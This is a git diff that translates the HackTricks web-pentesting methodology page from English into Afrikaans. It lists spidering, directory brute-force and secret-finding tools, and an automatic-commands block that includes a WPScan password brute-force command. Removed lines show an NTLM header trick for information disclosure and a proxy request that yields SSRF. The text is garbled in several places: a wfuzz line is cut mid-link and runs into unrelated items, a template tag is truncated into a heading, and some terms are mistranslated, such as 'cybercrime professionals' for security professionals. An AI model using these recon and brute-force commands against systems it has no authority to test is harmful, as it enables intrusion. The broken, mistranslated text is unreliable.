-Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** (In Bug Bounty programs probably these kind of vulnerabilities won't be accepted) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
+* As die toepassing **nie die gebruik van HTTPS afdwing nie** in enige deel nie, is dit **kwesbaar vir MitM**
+* As die toepassing **gevoelige data (wagwoorde) deur HTTP stuur**. Dit is 'n hoë kwesbaarheid.
 
+Gebruik [**testssl.sh**](https://github.com/drwetter/testssl.sh) om te kontroleer vir **kwesbaarhede** (In Bug Bounty-programme sal hierdie soort kwesbaarhede waarskynlik nie aanvaar word nie) en gebruik [**a2sv**](https://github.com/hahwul/a2sv) om die kwesbaarhede weer te kontroleer:
 ```bash
 ./testssl.sh [--htmlfile] 10.10.10.10:443
 #Use the --htmlfile to save the output inside an htmlfile also
@@ -219,69 +209,51 @@ Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vul
 sslscan 
 sslyze --regular 
 ```
-
-Information about SSL/TLS vulnerabilities:
+Inligting oor SSL/TLS kwesbaarhede:
 
 * [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
 * [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
 
 ### Spidering
 
-Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.
+Begin 'n soort **spinnekop** binne die web. Die doel van die spinnekop is om soveel moontlike paaie van die getoetste toepassing te vind. Daarom moet webkruip en eksterne bronne gebruik word om soveel geldige paaie as moontlik te vind.
 
-* [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
-* [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
-* [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files".
-* [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org
-* [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
-* [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
-* [**gau**](https://github.com/lc/gau) (go): HTML spider that uses external providers (wayback, otx, commoncrawl)
-* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
-* [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider with JS rendering capabilities.
-* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to [JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.
-* [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): To extract endpoints in both HTML source and embedded javascript files. Useful for bug hunters, red teamers, infosec ninjas.
-* [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintained.
-* [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Given a file (HTML) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly (minify) files.
-* [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, several tools): Gather interesting information from JS files using several tools.
-* [**subjs**](https://github.com/lc/subjs) (go): Find JS files.
-* [**page-fetch**](https://github.com/detectify/page-fetch) (go): Load a page in a headless browser and print out all the urls loaded to load the page.
-* [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Content discovery tool mixing several options of the previous tools
-* [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): A Burp extension to find path and params in JS files.
-* [**Sourcemapper**](https://github.com/denandz/sourcemapper): A tool that given the .js.map URL will get you the beatified JS code
-* [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): This is a tool used to discover endpoints for a given target.
-* [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links
-* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
-* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
-* [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
-* [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration.
+* [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spinnekop, LinkFinder in JS-lêers en eksterne bronne (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
+* [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spinnekop, met LinkFider vir JS-lêers en Archive.org as eksterne bron.
+* [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spinnekop, dui ook "sappige lêers" aan.
+* [**evine** ](https://github.com/saeeddhqan/evine)(go): Interaktiewe CLI HTML spinnekop. Dit soek ook in Archive.org
+* [**meg**](https://github.com/tomnomnom/meg) (go): Hierdie instrument is nie 'n spinnekop nie, maar dit kan nuttig wees. U kan net 'n lêer met gasheer en 'n lêer met paaie aandui en meg sal elke pad op elke gasheer haal en die respons stoor.
+* [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spinnekop met JS-rendering-vermoëns. Dit lyk egter asof dit nie onderhou word nie, die vooraf gekompileerde weergawe is oud en die huidige kode kom nie voor nie.
+* [**gau**](https://github.com/lc/gau) (go): HTML spinnekop wat eksterne verskaffers gebruik (wayback, otx, commoncrawl)
+* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): Hierdie skrip sal URL's met parameters vind en hulle lys.
+* [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spinnekop met JS-rendering-vermoëns.
+* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spinnekop, met JS-verfraaiingsvermoëns wat nuwe paaie in JS-lêers kan soek. Dit kan ook die moeite werd wees om na [JSScanner](https://github.com/dark-warlord14/JSScanner) te kyk, wat 'n omhulsel van LinkFinder is.
+* [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): Om eindpunte in beide HTML-bron en ingebedde javascript-lêers te onttrek. Nuttig vir foutsoekers, rooi spanne, infosec-ninjas.
+* [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): 'N Python 2.7-skrip wat Tornado en JSBeautifier gebruik om relatiewe URL's uit JavaScript-lêers te ontled. Nuttig vir die maklike ontdekking van AJAX-versoeke. Lyk asof dit nie onderhou word nie.
+* [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Gee 'n lêer (HTML) en sal URL's daaruit onttrek deur gebruik te maak van slim regulêre uitdrukking om die relatiewe URL's uit lelike (verkleinde) lêers te vind en te onttrek.
+* [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, verskeie instrumente): Versamel interessante inligting uit JS-lêers deur verskeie instrumente te gebruik.
+* [**subjs**](https://github.com/lc/subjs) (go): Vind JS-lêers.
+* [**page-fetch**](https://github.com/detectify/page-fetch) (go): Laai 'n bladsy in 'n koplose blaaier en druk al die gelaaide URL's om die bladsy te laai.
+* [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Inhoudsontdekkingsinstrument wat verskeie opsies van die vorige instrumente meng
+* [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): 'N Burp-uitbreiding om paaie en parameters in JS-lêers te vind.
+* [**Sourcemapper**](https://github.com/denandz/sourcemapper): 'N Instrument wat die mooi JS-kode sal kry as die .js.map-URL gegee word
+* [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): Hierdie instrument word gebruik om eindpunte vir 'n gegewe teiken te ontdek.
+* [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Ontdek skakels van die wayback-masjien (laai ook die antwoorde in die wayback af en soek na meer skakels
+* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Kruip (selfs deur vorms te vul) en vind ook sensitiewe inligting deur spesifieke regexes te gebruik.
+* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is 'n gevorderde multifunksie-GUI-websekuriteitskruiper/spinnekop wat ontwerp is vir kubermisdaadprofessionele.
+* [**jsluice**](https://github.com/BishopFox/jsluice) (go): Dit is 'n Go-pakket en [opdragreël-instrument](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) om URL's, paaie, geheime en ander interessante data uit JavaScript-bronkode te onttrek.
+* [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is 'n eenvoudige **Burp Suite-uitbreiding** om die parameters en eindpunte uit die versoek te onttrek om aangepaste woordelys vir fuzzing en opname te skep.
 
-### Brute Force directories and files
+### Brute Force-direktore en lêers
 
-Start **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** (you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories).\
-Tools:
+Begin **brute force** vanaf die hoofmap en verseker dat alle gevonde **direktore** met hierdie metode en al die deur die **Spidering** ontdekte direktore **brute force** word (u kan hierdie brute force **rekursief** doen en die name van die gevonde direktore aan die begin van die gebruikte woordelys toevoeg).\
+Instrumente:
 
-* **Dirb** / **Dirbuster** - Included in Kali, **old** (and **slow**) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
-* [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: It doesn't allow auto-signed certificates but** allows recursive search.
-* [**Gobuster**](https://github.com/OJ/gobuster) (go): It allows auto-signed certificates, it **doesn't** have **recursive** search.
-* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
-* [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
-* [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
-* [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs.
-* [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension to create a list of directories from the burp history of different pages
-* [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Remove URLs with duplicated functionalities (based on js imports)
-* [**Chamaleon**](https://github.com/iustin24/chameleon): It uses wapalyzer to detect used technologies and select the wordlists to use.
-
-**Recommended dictionaries:**
-
-* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt)
-* [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
-* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
-* [Assetnote wordlists](https://wordlists.assetnote.io)
-* [https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
-  * raft-large-directories-lowercase.txt
-  * directory-list-2.3-medium.txt
-  * RobotsDisallowed/top10000.txt
-* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
+* **Dirb** / **Dirbuster** - Ingesluit in Kali, **oud** (en **stadig**) maar funksioneel. Laat outomatiese ondertekende sertifikate en rekursiewe soektog toe. Te stadig in vergelyking met die ander opsies.
+* [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: Dit laat nie outomatiese ondertekende sertifikate toe nie, maar** maak rekursiewe soektog moontlik.
+* [**Gobuster**](https://github.com/OJ/gobuster) (go): Dit laat outomatiese ondertekende sertifikate toe, dit het **nie** rekursiewe soektog nie.
+* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Vinnig, ondersteun rekursiewe soektog.**
+* [**wfuzz**](https
 * [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
 * [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
 * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
@@ -289,167 +261,148 @@ Tools:
 * _/usr/share/wordlists/dirb/big.txt_
 * _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
 
-_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
+_Merk op dat enige tyd 'n nuwe gids ontdek word tydens brute-forcing of spidering, dit moet Brute-Forced word._
 
-### What to check on each file found
+### Wat om op elke gevonde lêer te kontroleer
 
-* [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
-* **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
-* **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
-  * _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
-  * _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
-  * _Assetnote “parameters\_top\_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
-  * _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
-* **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
-  * If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
-* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
-  * Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access.
-* **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/).
+* [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Vind gebroke skakels binne HTML's wat vatbaar kan wees vir oorname
+* **Lêer-backups**: Sodra jy al die lêers gevind het, soek na backups van al die uitvoerbare lêers ("_.php_", "_.aspx_"...). Gewone variasies vir die benaming van 'n backup is: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp en file.old._ Jy kan ook die hulpmiddel [**bfac**](https://github.com/mazen160/bfac) **of** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.** gebruik.
+* **Ontdek nuwe parameters**: Jy kan hulpmiddels soos [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **en** [**Param Miner**](https://github.com/PortSwigger/param-miner) **gebruik om verskuilde parameters te ontdek. As jy kan, kan jy probeer om** verskuilde parameters op elke uitvoerbare web-lêer te soek.
+* _Arjun alle verstek woordelyste:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
+* _Param-miner "params":_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
+* _Assetnote "parameters_top_1m":_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
+* _nullenc0de "params.txt":_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
+* **Opmerkings:** Kontroleer die opmerkings van al die lêers, jy kan **geloofsbriewe** of **verskuilde funksionaliteit** vind.
+* As jy **CTF** speel, is 'n "gewone" truuk om **inligting** **binne opmerkings** aan die **regterkant** van die **bladsy** te **versteek** (deur **honderde spasies** te gebruik sodat jy die data nie sien as jy die bronkode met die blaaier oopmaak nie). 'n Ander moontlikheid is om **verskeie nuwe lyne** te gebruik en **inligting te versteek** in 'n opmerking aan die **onderkant** van die webbladsy.
+* **API-sleutels**: As jy enige API-sleutel **vind**, is daar 'n gids wat aandui hoe om API-sleutels van verskillende platforms te gebruik: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
+* Google API-sleutels: As jy enige API-sleutel vind wat lyk soos **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik, kan jy die projek [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) gebruik om te kyk watter API's die sleutel kan gebruik.
+* **S3 Buckets**: Terwyl jy spidering doen, kyk of enige **subdomein** of enige **skakel** verband hou met 'n **S3-bucket**. In daardie geval, [**kontroleer** die **toestemmings** van die bucket](buckets/).
 
-### Special findings
+### Spesiale bevindinge
 
-**While** performing the **spidering** and **brute-forcing** you could find **interesting** **things** that you have to **notice**.
+**Terwyl** jy die **spidering** en **brute-forcing** uitvoer, kan jy **interessante dinge** vind wat jy moet **opmerk**.
 
-**Interesting files**
+**Interessante lêers**
 
-* Look for **links** to other files inside the **CSS** files.
-* [If you find a _**.git**_ file some information can be extracted](git.md)
-* If you find a _**.env**_ information such as api keys, dbs passwords and other information can be found.
-* If you find **API endpoints** you [should also test them](web-api-pentesting.md). These aren't files, but will probably "look like" them.
-* **JS files**: In the spidering section several tools that can extract path from JS files were mentioned. Also, It would be interesting to **monitor each JS file found**, as in some ocations, a change may indicate that a potential vulnerability was introduced in the code. You could use for example [**JSMon**](https://github.com/robre/jsmon)**.**
-  * You should also check discovered JS files with [**RetireJS**](https://github.com/retirejs/retire.js/) or [**JSHole**](https://github.com/callforpapers-source/jshole) to find if it's vulnerable.
-  * **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
-  * **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
-  * **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/))
-  * [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
-  * In several occasions you will need to **understand regular expressions** used, this will be useful: [https://regex101.com/](https://regex101.com)
-* You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.
+* Soek na **skakels** na ander lêers binne die **CSS**-lêers.
+* [As jy 'n _**.git**_-lêer vind, kan sekere inligting onttrek word](git.md)
+* As jy 'n _**.env**_-lêer vind, kan inligting soos API-sleutels, databasiswagwoorde en ander inligting gevind word.
+* As jy **API-eindpunte** vind, [moet jy hulle ook toets](web-api-pentesting.md). Dit is nie lêers nie, maar sal waarskynlik "soos" lêers lyk.
+* **JS-lêers**: In die spidering-afdeling is verskeie hulpmiddels genoem wat paaie uit JS-lêers kan onttrek. Dit sal ook interessant wees om **elke gevonde JS-lêer te monitor**, aangesien 'n verandering in sommige gevalle kan aandui dat 'n potensiële kwesbaarheid in die kode ingevoer is. Jy kan byvoorbeeld [**JSMon**](https://github.com/robre/jsmon)**.** gebruik.
+* Jy moet ook ontdekte JS-lêers met [**RetireJS**](https://github.com/retirejs/retire.js/) of [**JSHole**](https://github.com/callforpapers-source/jshole) kontroleer om te sien of dit kwesbaar is.
+* **Javascript Deobfuscator en Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
+* **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
+* **JsFuck deobfuscation** (javascript met karakters: "\[]!+" [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/))
+* [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
+* In verskeie gevalle sal jy die gebruikte **gewone uitdrukkings** moet verstaan, dit sal nuttig wees: [https://regex101.com/](https://regex101.com)
+* Jy kan ook **die lêers monitor waar vorms opgespoor is**, aangesien 'n verandering in die parameter of die verskyning van 'n nuwe vorm moontlik 'n potensiële nuwe kwesbare funksionaliteit kan aandui.
 
-**403 Forbidden/Basic Authentication/401 Unauthorized (bypass)**
+**403 Verbode/Grondwetlike Verifikasie/401 Onbevoegd (omseil)**
 
-{% content-ref url="403-and-401-bypasses.md" %}
-[403-and-401-bypasses.md](403-and-401-bypasses.md)
-{% endcontent-ref %}
+{% content-ref url="
+### Web Kwesbaarhede Kontrole
 
-**502 Proxy Error**
-
-If any page **responds** with that **code**, it's probably a **bad configured proxy**. **If you send a HTTP request like: `GET https://google.com HTTP/1.1`** (with the host header and other common headers), the **proxy** will try to **access** _**google.com**_ **and you will have found a** SSRF.
-
-**NTLM Authentication - Info disclosure**
-
-If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** (and asking for **domain** **name**), you can provoke an **information disclosure**.\
-**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info (IIS version, Windows version...) inside the header "WWW-Authenticate".\
-You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
-
-**HTTP Redirect (CTF)**
-
-It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** (as the browser will execute the redirection) but something could be **hidden** in there.
-
-### Web Vulnerabilities Checking
-
-Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here:
+Nou dat 'n omvattende opname van die webtoepassing uitgevoer is, is dit tyd om vir baie moontlike kwesbaarhede te kyk. Jy kan die lys hier vind:
 
 {% content-ref url="../../pentesting-web/web-vulnerabilities-methodology/" %}
 [web-vulnerabilities-methodology](../../pentesting-web/web-vulnerabilities-methodology/)
 {% endcontent-ref %}
 
-Find more info about web vulns in:
+Vind meer inligting oor web kwesbaarhede by:
 
 * [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
 * [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html)
 * [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)
 
-### Monitor Pages for changes
+### Monitor Bladsye vir veranderinge
 
-You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
-
-### HackTricks Automatic Commands
+Jy kan hulpmiddels soos [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) gebruik om bladsye te monitor vir wysigings wat moontlik kwesbaarhede kan invoeg.
 
+### HackTricks Outomatiese Opdragte
 ```
 Protocol_Name: Web    #Protocol Abbreviation if there is one.
 Port_Number:  80,443     #Comma separated if there is more than one.
 Protocol_Description: Web         #Protocol Abbreviation Spelled out
 
 Entry_1:
-  Name: Notes
-  Description: Notes for Web
-  Note: |
-    https://book.hacktricks.xyz/pentesting/pentesting-web
+Name: Notes
+Description: Notes for Web
+Note: |
+https://book.hacktricks.xyz/pentesting/pentesting-web
 
 Entry_2:
-  Name: Quick Web Scan
-  Description: Nikto and GoBuster
-  Command: nikto -host {Web_Proto}://{IP}:{Web_Port} &&&& gobuster dir -w {Small_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} && gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port}
+Name: Quick Web Scan
+Description: Nikto and GoBuster
+Command: nikto -host {Web_Proto}://{IP}:{Web_Port} &&&& gobuster dir -w {Small_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} && gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port}
 
 Entry_3:
-  Name: Nikto
-  Description: Basic Site Info via Nikto
-  Command: nikto -host {Web_Proto}://{IP}:{Web_Port}
+Name: Nikto
+Description: Basic Site Info via Nikto
+Command: nikto -host {Web_Proto}://{IP}:{Web_Port}
 
 Entry_4:
-  Name: WhatWeb
-  Description: General purpose auto scanner
-  Command: whatweb -a 4 {IP}
+Name: WhatWeb
+Description: General purpose auto scanner
+Command: whatweb -a 4 {IP}
 
 Entry_5:
-  Name: Directory Brute Force Non-Recursive
-  Description:  Non-Recursive Directory Brute Force
-  Command: gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port}
+Name: Directory Brute Force Non-Recursive
+Description:  Non-Recursive Directory Brute Force
+Command: gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port}
 
 Entry_6:
-  Name: Directory Brute Force Recursive
-  Description: Recursive Directory Brute Force
-  Command: python3 {Tool_Dir}dirsearch/dirsearch.py -w {Small_Dirlist} -e php,exe,sh,py,html,pl -f -t 20 -u {Web_Proto}://{IP}:{Web_Port} -r 10
+Name: Directory Brute Force Recursive
+Description: Recursive Directory Brute Force
+Command: python3 {Tool_Dir}dirsearch/dirsearch.py -w {Small_Dirlist} -e php,exe,sh,py,html,pl -f -t 20 -u {Web_Proto}://{IP}:{Web_Port} -r 10
 
 Entry_7:
-  Name: Directory Brute Force CGI
-  Description: Common Gateway Interface Brute Force
-  Command: gobuster dir -u {Web_Proto}://{IP}:{Web_Port}/ -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s 200
+Name: Directory Brute Force CGI
+Description: Common Gateway Interface Brute Force
+Command: gobuster dir -u {Web_Proto}://{IP}:{Web_Port}/ -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s 200
 
 Entry_8:
-  Name: Nmap Web Vuln Scan
-  Description: Tailored Nmap Scan for web Vulnerabilities
-  Command: nmap -vv --reason -Pn -sV -p {Web_Port} --script=`banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)` {IP}
+Name: Nmap Web Vuln Scan
+Description: Tailored Nmap Scan for web Vulnerabilities
+Command: nmap -vv --reason -Pn -sV -p {Web_Port} --script=`banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)` {IP}
 
 Entry_9:
-  Name: Drupal
-  Description: Drupal Enumeration Notes
-  Note: |
-    git clone https://github.com/immunIT/drupwn.git for low hanging fruit and git clone https://github.com/droope/droopescan.git for deeper enumeration
+Name: Drupal
+Description: Drupal Enumeration Notes
+Note: |
+git clone https://github.com/immunIT/drupwn.git for low hanging fruit and git clone https://github.com/droope/droopescan.git for deeper enumeration
 
 Entry_10:
-  Name: WordPress
-  Description: WordPress Enumeration with WPScan
-  Command: |
-    ?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
-    wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
+Name: WordPress
+Description: WordPress Enumeration with WPScan
+Command: |
+?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
+wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
